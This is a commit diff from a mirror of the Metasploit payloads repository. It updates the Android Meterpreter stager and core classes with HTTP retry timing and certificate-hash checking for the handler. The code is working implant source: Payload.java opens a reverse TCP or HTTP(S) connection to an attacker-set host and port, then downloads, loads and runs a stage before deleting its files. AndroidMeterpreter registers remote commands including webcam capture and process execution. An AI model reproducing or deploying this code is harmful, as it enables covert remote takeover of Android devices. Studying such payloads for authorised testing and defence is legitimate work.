github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00
Code Releases Activity

Land #36, initial http retry and cert validation support

Browse Source
This commit is contained in:
Brent Cook 2015-05-26 22:42:45 -05:00
commit 97bda0ac40
7 changed files with 171 additions and 113 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

146
java/androidpayload/app/src/com/metasploit/stage/Payload.java
View File

@ -2,31 +2,31 @@ package com.metasploit.stage;
import android.content.Context;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
import java.util.Random;
import javax.net.ssl.HttpsURLConnection;
import java.util.concurrent.TimeUnit;
import dalvik.system.DexClassLoader;
public class Payload {
public static final String LHOST = "XXXX127.0.0.1 ";
public static final String LPORT = "YYYY4444 ";
public static final String URL = "ZZZZ ";
public static final String TRIALS = "TTTT ";
public static final String URL = "ZZZZ ";
public static final String CERT_HASH = "WWWW ";
public static final String LHOST = "XXXX127.0.0.1 ";
public static final String LPORT = "YYYY4444 ";
public static final String RETRY_TOTAL = "TTTT ";
public static final String RETRY_WAIT = "SSSS ";
private static final int URI_CHECKSUM_INITJ = 88;
private static final String AB = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
private static final Random rnd = new Random();
public static long retry_total;
public static long retry_wait;
private static String[] parameters;
@ -55,96 +55,63 @@ public class Payload {
String path = currentDir.getAbsolutePath();
parameters = new String[]{path};
}
int nTrials = Integer.parseInt(TRIALS.substring(4).trim());
while (!startReverseConn() && nTrials-- > 0) {
try {
Thread.sleep(60000);
} catch (InterruptedException e) {
}
}
}
private static boolean startReverseConn() {
int retryTotal;
int retryWait;
try {
if (URL.substring(4).trim().length() == 0) {
reverseTCP();
} else {
reverseHTTP();
retryTotal = Integer.parseInt(RETRY_TOTAL.substring(4).trim());
retryWait = Integer.parseInt(RETRY_WAIT.substring(4).trim());
} catch (NumberFormatException e) {
return;
}
long payloadStart = System.currentTimeMillis();
retry_total = TimeUnit.SECONDS.toMillis(retryTotal);
retry_wait = TimeUnit.SECONDS.toMillis(retryWait);
while (System.currentTimeMillis() < payloadStart + retry_total) {
try {
if (URL.substring(4).trim().length() == 0) {
reverseTCP();
} else {
reverseHTTP();
}
return;
} catch (Exception e) {
e.printStackTrace();
}
try {
Thread.sleep(retry_wait);
} catch (InterruptedException e) {
return;
}
return true;
} catch (Exception e) {
return false;
}
}
private static String randomString(int len) {
StringBuilder sb = new StringBuilder(len);
for (int i = 0; i < len; i++) {
sb.append(AB.charAt(rnd.nextInt(AB.length())));
}
return sb.toString();
}
private static int checksumText(String s) {
int tmp = 0;
for (int i = 0; i < s.length(); i++) {
tmp += (int) s.charAt(i);
}
return tmp % 0x100;
}
private static void reverseHTTP() throws Exception {
int checksum;
String URI;
HttpURLConnection urlConn;
String lurl = URL.substring(4).trim();
while (true) {
URI = randomString(4);
checksum = checksumText(URI);
if (checksum == URI_CHECKSUM_INITJ)
break;
}
String FullURI = "/" + URI;
URL url = new URL(lurl + FullURI + "_" + randomString(16));
InputStream inStream;
if (lurl.startsWith("https")) {
urlConn = (HttpsURLConnection) url.openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager")
.getMethod("useFor", new Class[]{URLConnection.class})
.invoke(null, new Object[]{urlConn});
URLConnection uc = new URL(lurl).openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, uc);
inStream = uc.getInputStream();
} else {
urlConn = (HttpURLConnection) url.openConnection();
inStream = new URL(lurl).openStream();
}
urlConn.setDoInput(true);
urlConn.setRequestMethod("GET");
urlConn.connect();
DataInputStream in = new DataInputStream(urlConn.getInputStream());
loadStage(in, null, parameters);
urlConn.disconnect();
OutputStream out = new ByteArrayOutputStream();
DataInputStream in = new DataInputStream(inStream);
loadStage(in, out, parameters);
}
private static void reverseTCP() {
try {
String lhost = LHOST.substring(4).trim();
String lport = LPORT.substring(4).trim();
Socket msgsock = new Socket(lhost, Integer.parseInt(lport));
DataInputStream in = new DataInputStream(msgsock.getInputStream());
OutputStream out = new DataOutputStream(msgsock.getOutputStream());
loadStage(in, out, parameters);
} catch (Exception e) {
e.printStackTrace();
}
private static void reverseTCP() throws Exception {
String lhost = LHOST.substring(4).trim();
String lport = LPORT.substring(4).trim();
Socket msgsock = new Socket(lhost, Integer.parseInt(lport));
DataInputStream in = new DataInputStream(msgsock.getInputStream());
OutputStream out = new DataOutputStream(msgsock.getOutputStream());
loadStage(in, out, parameters);
}
private static void loadStage(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
String path = parameters[0];
String filePath = path + File.separatorChar + "payload.jar";
String dexPath = path + File.separatorChar + "payload.dex";
@ -176,9 +143,8 @@ public class Payload {
final Object stage = myClass.newInstance();
file.delete();
new File(dexPath).delete();
myClass.getMethod(
"start",
new Class[]{DataInputStream.class, OutputStream.class, String[].class}).invoke(stage,
new Object[]{in, out, parameters});
myClass.getMethod("start",
new Class[]{DataInputStream.class, OutputStream.class, String[].class})
.invoke(stage, in, out, parameters);
}
}

43
java/androidpayload/app/src/com/metasploit/stage/PayloadTrustManager.java
View File

@ -42,6 +42,10 @@ import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateEncodingException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
/**
@ -57,14 +61,49 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
return new X509Certificate[0];
}
public static String getCertificateSHA1(X509Certificate cert)
throws NoSuchAlgorithmException, CertificateEncodingException {
MessageDigest md = MessageDigest.getInstance("SHA-1");
md.update(cert.getEncoded());
return bytesToHex(md.digest());
}
public static String bytesToHex(byte bytes[]) {
char[] hexDigits = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder buf = new StringBuilder(bytes.length * 2);
for (byte aByte : bytes) {
buf.append(hexDigits[(aByte & 0xf0) >> 4]);
buf.append(hexDigits[aByte & 0x0f]);
}
return buf.toString();
}
public void checkClientTrusted(java.security.cert.X509Certificate[] certs,
String authType) {
// trust everyone
}
public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
String authType) {
// trust everyone
String authType) throws CertificateException {
String payloadHash = Payload.CERT_HASH.substring(4).trim();
if (payloadHash.length() == 0) {
// No HandlerSSLCert set on payload, trust everyone
return;
}
if (certs == null || certs.length < 1) {
throw new CertificateException();
}
for (X509Certificate certificate : certs) {
try {
String serverHash = getCertificateSHA1(certificate);
if (!serverHash.equals(payloadHash)) {
throw new CertificateException("Invalid certificate");
}
} catch (Exception e) {
throw new CertificateException(e);
}
}
}
public boolean verify(String hostname, SSLSession session) {

6
java/androidpayload/library/pom.xml
View File

@ -32,6 +32,12 @@
<artifactId>Metasploit-Java-Meterpreter-stdapi</artifactId>
<version>${project.version}</version>
</dependency>
<dependency>
<groupId>com.metasploit</groupId>
<artifactId>Metasploit-AndroidPayload</artifactId>
<version>${project.version}</version>
<scope>provided</scope>
</dependency>
</dependencies>
<build>
<finalName>${project.artifactId}</finalName>

46
java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
View File

@ -17,6 +17,7 @@ import com.metasploit.meterpreter.android.webcam_get_frame_android;
import com.metasploit.meterpreter.android.webcam_list_android;
import com.metasploit.meterpreter.android.webcam_start_android;
import com.metasploit.meterpreter.android.webcam_stop_android;
import com.metasploit.meterpreter.core.core_transport_set_timeouts;
import com.metasploit.meterpreter.stdapi.Loader;
import com.metasploit.meterpreter.stdapi.channel_create_stdapi_fs_file;
import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_client;
@ -42,45 +43,44 @@ import com.metasploit.meterpreter.stdapi.stdapi_sys_process_execute_V1_3;
import java.io.DataInputStream;
import java.io.File;
import java.io.OutputStream;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
public class AndroidMeterpreter extends Meterpreter {
private static final Object contextWaiter = new Object();
private static String writeableDir;
private static Context context;
private void startExecutingOnThread() {
new Thread() {
@Override
public void run() {
try {
startExecuting();
} catch (Exception e) {
e.printStackTrace();
}
}
}.start();
}
private void findContext() throws Exception {
final Class<?> activityThreadClass = Class.forName("android.app.ActivityThread");
Class<?> activityThreadClass;
try {
activityThreadClass = Class.forName("android.app.ActivityThread");
} catch (ClassNotFoundException e) {
// No context (running as root?)
return;
}
final Method currentApplication = activityThreadClass.getMethod("currentApplication");
context = (Context) currentApplication.invoke(null, (Object[]) null);
if (context == null) {
Handler handler = new Handler(Looper.getMainLooper());
// Post to the UI/Main thread and try and retrieve the Context
final Handler handler = new Handler(Looper.getMainLooper());
handler.post(new Runnable() {
@Override
public void run() {
try {
context = (Context) currentApplication.invoke(null, (Object[]) null);
} catch (Exception e) {
e.printStackTrace();
}
startExecutingOnThread();
synchronized (contextWaiter) {
contextWaiter.notify();
}
}
});
} else {
startExecuting();
synchronized (contextWaiter) {
contextWaiter.wait();
}
}
}
@ -95,8 +95,13 @@ public class AndroidMeterpreter extends Meterpreter {
findContext();
} catch (Exception e) {
e.printStackTrace();
startExecuting();
}
startExecuting();
}
@Override
protected String getPayloadTrustManager() {
return "com.metasploit.stage.PayloadTrustManager";
}
@Override
@ -104,6 +109,7 @@ public class AndroidMeterpreter extends Meterpreter {
getCommandManager().resetNewCommands();
CommandManager mgr = getCommandManager();
Loader.cwd = new File(writeableDir);
mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class);
mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class);
mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class);
mgr.registerCommand("channel_create_stdapi_net_tcp_server", channel_create_stdapi_net_tcp_server.class);

24
java/androidpayload/library/src/com/metasploit/meterpreter/core/core_transport_set_timeouts.java Normal file
View File

@ -0,0 +1,24 @@
package com.metasploit.meterpreter.core;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.stage.Payload;
import java.util.concurrent.TimeUnit;
public class core_transport_set_timeouts implements Command {
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
Integer retryTotal = (Integer)request.getValue(TLVType.TLV_TYPE_TRANS_RETRY_TOTAL, null);
Integer retryWait = (Integer)request.getValue(TLVType.TLV_TYPE_TRANS_RETRY_WAIT, null);
if (retryTotal != null) {
Payload.retry_total = TimeUnit.SECONDS.toMillis(retryTotal.intValue());
}
if (retryWait != null) {
Payload.retry_wait = TimeUnit.SECONDS.toMillis(retryWait.intValue());
}
return ERROR_SUCCESS;
}
}

6
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
View File

@ -106,6 +106,10 @@ public class Meterpreter {
}
}
protected String getPayloadTrustManager() {
return "com.metasploit.meterpreter.PayloadTrustManager";
}
/**
* Write a TLV packet to this meterpreter's output stream.
*
@ -188,7 +192,7 @@ public class Meterpreter {
// load the trust manager via reflection, to avoid loading
// it when it is not needed (it requires Sun Java 1.4+)
try {
Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
} catch (Exception ex) {
ex.printStackTrace(getErrorStream());
}

13
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
View File

@ -43,6 +43,19 @@ public interface TLVType {
public static final int TLV_TYPE_MIGRATE_PID = TLVPacket.TLV_META_TYPE_UINT | 402;
public static final int TLV_TYPE_MIGRATE_LEN = TLVPacket.TLV_META_TYPE_UINT | 403;
public static final int TLV_TYPE_TRANS_TYPE = TLVPacket.TLV_META_TYPE_UINT | 430;
public static final int TLV_TYPE_TRANS_URL = TLVPacket.TLV_META_TYPE_STRING | 431;
public static final int TLV_TYPE_TRANS_UA = TLVPacket.TLV_META_TYPE_STRING | 432;
public static final int TLV_TYPE_TRANS_COMM_TIMEOUT = TLVPacket.TLV_META_TYPE_UINT | 433;
public static final int TLV_TYPE_TRANS_SESSION_EXP = TLVPacket.TLV_META_TYPE_UINT | 434;
public static final int TLV_TYPE_TRANS_CERT_HASH = TLVPacket.TLV_META_TYPE_RAW | 435;
public static final int TLV_TYPE_TRANS_PROXY_HOST = TLVPacket.TLV_META_TYPE_STRING | 436;
public static final int TLV_TYPE_TRANS_PROXY_USER = TLVPacket.TLV_META_TYPE_STRING | 437;
public static final int TLV_TYPE_TRANS_PROXY_PASS = TLVPacket.TLV_META_TYPE_STRING | 438;
public static final int TLV_TYPE_TRANS_RETRY_TOTAL = TLVPacket.TLV_META_TYPE_UINT | 439;
public static final int TLV_TYPE_TRANS_RETRY_WAIT = TLVPacket.TLV_META_TYPE_UINT | 440;
public static final int TLV_TYPE_TRANS_GROUP = TLVPacket.TLV_META_TYPE_GROUP | 441;
public static final int TLV_TYPE_CIPHER_NAME = TLVPacket.TLV_META_TYPE_STRING | 500;
public static final int TLV_TYPE_CIPHER_PARAMETERS = TLVPacket.TLV_META_TYPE_GROUP | 501;